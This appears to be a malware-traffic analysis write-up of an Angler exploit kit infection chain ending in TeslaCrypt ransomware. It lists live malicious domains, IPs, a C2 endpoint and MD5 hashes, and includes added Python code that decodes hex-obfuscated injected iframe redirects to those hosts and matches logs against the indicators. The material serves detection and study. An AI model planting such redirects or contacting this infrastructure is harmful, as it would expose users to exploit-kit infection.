Angler EK from 95.211.18.75 sends TeslaCrypt

ASSOCIATED DOMAINS:

www.firstagarment.com – COMPROMISED SITE
95.211.18.75 – reukweerderjodis.crystalclearcleaningsevice.com – ANGLER EK
93.171.217.50 – img.golovkakrokodila.info GET /helloresearcher/ – Admedia gate (did not play a role in the infection)
173.201.145.1 – dustinhansenbook.com POST /wstr.php – post-infection traffic [TeslaCrypt]


DETAILS:

Shown above: First malicious script found in the compromised site's homepage


Shown above: Pasting the hex above into a hex-to-ASCII converter reveals a redirect to the “admedia” gate – img.golovkakrokodila.info
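The hex-to-ASCII step above is easy to script so the redirect target can be pulled out of an injected script without pasting it into a web converter. The block below is an added example, not code from the write-up: it decodes raw hex runs and the other common encoding (`\xNN`/`%NN` escapes), then extracts the hosts the decoded text points at. Both sample scripts are constructed here; the gate host and `/helloresearcher/` path and the Angler EK host are the ones named in the write-up, while the `/assumed-landing/` path and the script layout are assumptions.

```python
import re
from typing import List

# Added example (not from the write-up): decode hex-obfuscated injected
# scripts of the kind described above and pull out the host they redirect to.
# Sample 1 is constructed here: a raw-hex string decoded by a small loop.
# The gate host and /helloresearcher/ path are from the write-up.
PLAIN_GATE = ('<iframe src="http://img.golovkakrokodila.info/helloresearcher/" '
              'width="1" height="1"></iframe>')
SAMPLE_RAW_HEX_SCRIPT = (
    '<script>var h="' + PLAIN_GATE.encode().hex() + '";var s="";'
    'for(var i=0;i<h.length;i+=2){s+=String.fromCharCode(parseInt(h.substr(i,2),16));}'
    'document.write(s);</script>'
)

# Sample 2 is constructed with \xNN escapes; the host is the Angler EK host
# from the write-up, the /assumed-landing/ path is an assumption.
PLAIN_EK = ('<iframe src="http://reukweerderjodis.crystalclearcleaningsevice.com'
            '/assumed-landing/"></iframe>')
SAMPLE_ESCAPED_SCRIPT = ('<script>document.write("'
                         + ''.join('\\x%02x' % b for b in PLAIN_EK.encode())
                         + '");</script>')

# A run of at least 16 hex bytes that is not part of a longer hex/odd run.
HEX_RUN = re.compile(r'(?<![0-9a-fA-F])((?:[0-9a-fA-F]{2}){16,})(?![0-9a-fA-F])')
# A run of at least 8 \xNN or %NN escapes.
ESCAPED_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}){8,}')
# URL inside the decoded text; group 1 is the host.
URL_RE = re.compile(r'https?://([A-Za-z0-9.-]+)(?:/[^\s"\'<>]*)?')


def decode_hex_strings(script: str) -> List[str]:
    """Return the decoded text of every hex-encoded string found in the script."""
    decoded = []
    for m in HEX_RUN.finditer(script):
        decoded.append(bytes.fromhex(m.group(1)).decode('latin-1'))
    for m in ESCAPED_RUN.finditer(script):
        pairs = re.findall(r'(?:\\x|%)([0-9a-fA-F]{2})', m.group(0))
        decoded.append(bytes.fromhex(''.join(pairs)).decode('latin-1'))
    return decoded


def extract_hosts(script: str) -> List[str]:
    """Hosts referenced by URLs in the decoded strings, in order of first appearance."""
    hosts: List[str] = []
    for text in decode_hex_strings(script):
        for m in URL_RE.finditer(text):
            if m.group(1) not in hosts:
                hosts.append(m.group(1))
    return hosts


if __name__ == '__main__':
    for label, script in (('raw hex', SAMPLE_RAW_HEX_SCRIPT),
                          ('\\x escapes', SAMPLE_ESCAPED_SCRIPT)):
        print(label, '->', extract_hosts(script))
```

Run as a script it prints the gate host for the first sample and the EK host for the second; in practice you would feed it the `<script>` bodies scraped from the compromised page and compare the extracted hosts against your blocklist before the page is served to users.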


Shown above: Second malicious script found in the compromised site's homepage


Shown above: Packet capture shows the second JavaScript found on the compromised site referred the browser to Angler EK – not to the admedia gate


Shown above: Angler flash exploit and TeslaCrypt payload


Shown above: TeslaCrypt exe file and metadata

Shown above: TeslaCrypt post infection traffic – [C2 check-in]


MD5 HASHES FOR EXPLOITS AND PAYLOAD FROM ANGLER EK:

  • 095b16235c31ca41008fcc4fb19d391d – 03-02-2016-Angler.swf
  • 565c7c98445aba684c1ceca56aaa6ad7 – 03-02-2016-TeslaCrypt.exe
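The indicators above are only useful once they are run against your own telemetry. The block below is an added example, not part of the write-up: it matches proxy log lines against the listed hosts and IPs, labels each hit with the role the write-up assigns, triages each client by whether Angler EK contact was followed by the TeslaCrypt C2 check-in, and checks file hashes against the two MD5s. The log layout (timestamp, client, method, URL, destination IP, status) and the sample lines are constructed here; the indicators and the two hashes are the write-up's.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Added example (not from the write-up): match logs and hashes against the
# indicators listed above and triage each client by what it reached.
# Indicator values and role labels are the write-up's; the log format is assumed.
IOC_HOSTS = {
    'www.firstagarment.com': 'compromised site',
    'img.golovkakrokodila.info': 'admedia gate',
    'reukweerderjodis.crystalclearcleaningsevice.com': 'Angler EK',
    'dustinhansenbook.com': 'TeslaCrypt C2',
}
IOC_IPS = {
    '95.211.18.75': 'Angler EK',
    '93.171.217.50': 'admedia gate',
    '173.201.145.1': 'TeslaCrypt C2',
}
IOC_MD5 = {
    '095b16235c31ca41008fcc4fb19d391d': 'Angler flash exploit (03-02-2016-Angler.swf)',
    '565c7c98445aba684c1ceca56aaa6ad7': 'TeslaCrypt payload (03-02-2016-TeslaCrypt.exe)',
}

# Constructed log lines (assumed layout): timestamp client method url dest_ip status.
# 10.0.0.23 walks the whole chain from the write-up, 10.0.0.44 only reaches the
# EK server by bare IP, 10.0.0.51 is clean. Destination IPs for non-IOC hosts
# are documentation-range placeholders.
SAMPLE_LOG = """\
2016-03-02T14:01:05Z 10.0.0.23 GET http://www.firstagarment.com/ 203.0.113.10 200
2016-03-02T14:01:06Z 10.0.0.23 GET http://img.golovkakrokodila.info/helloresearcher/ 93.171.217.50 200
2016-03-02T14:01:07Z 10.0.0.23 GET http://reukweerderjodis.crystalclearcleaningsevice.com/ 95.211.18.75 200
2016-03-02T14:01:12Z 10.0.0.23 POST http://dustinhansenbook.com/wstr.php 173.201.145.1 200
2016-03-02T14:03:40Z 10.0.0.44 GET http://95.211.18.75/ 95.211.18.75 200
2016-03-02T14:05:00Z 10.0.0.51 GET http://example.com/ 203.0.113.20 200
"""

LOG_LINE = re.compile(
    r'^(\S+) (\S+) (GET|POST) https?://([^/\s]+)(?:/\S*)? (\S+) (\d{3})$')


@dataclass
class Hit:
    ts: str
    client: str
    indicator: str
    role: str


def match_iocs(log_text: str) -> List[Hit]:
    """One Hit per log line whose host or destination IP is a listed indicator."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts, client, _method, host, dest_ip, _status = m.groups()
        host = host.lower()
        if host in IOC_HOSTS:
            hits.append(Hit(ts, client, host, IOC_HOSTS[host]))
        elif dest_ip in IOC_IPS:  # host not listed (e.g. bare IP): use the destination
            hits.append(Hit(ts, client, dest_ip, IOC_IPS[dest_ip]))
    return hits


def triage(hits: List[Hit]) -> Dict[str, str]:
    """Per client: did it reach the EK, and did a C2 check-in follow that contact?"""
    by_client: Dict[str, List[Hit]] = {}
    for h in hits:
        by_client.setdefault(h.client, []).append(h)
    verdicts: Dict[str, str] = {}
    for client, hs in by_client.items():
        roles = [h.role for h in sorted(hs, key=lambda h: h.ts)]
        ek_at = next((i for i, r in enumerate(roles) if r == 'Angler EK'), None)
        if ek_at is not None and 'TeslaCrypt C2' in roles[ek_at + 1:]:
            verdicts[client] = 'likely infected: Angler EK contact followed by TeslaCrypt C2 check-in'
        elif ek_at is not None:
            verdicts[client] = 'exposed: reached Angler EK, no C2 check-in seen'
        else:
            verdicts[client] = 'contact: compromised site or gate only'
    return verdicts


def classify_hash(md5: str) -> Optional[str]:
    """Label a file by MD5 against the write-up's hashes (case-insensitive)."""
    return IOC_MD5.get(md5.strip().lower())


if __name__ == '__main__':
    found = match_iocs(SAMPLE_LOG)
    for h in found:
        print(h.ts, h.client, h.indicator, '->', h.role)
    for client, verdict in triage(found).items():
        print(client, verdict)
```

The ordering check in `triage` is what separates a host that merely loaded the landing page from one that completed the chain: the POST to `/wstr.php` after the EK contact is the signal that the payload ran, so those clients are the ones to isolate first.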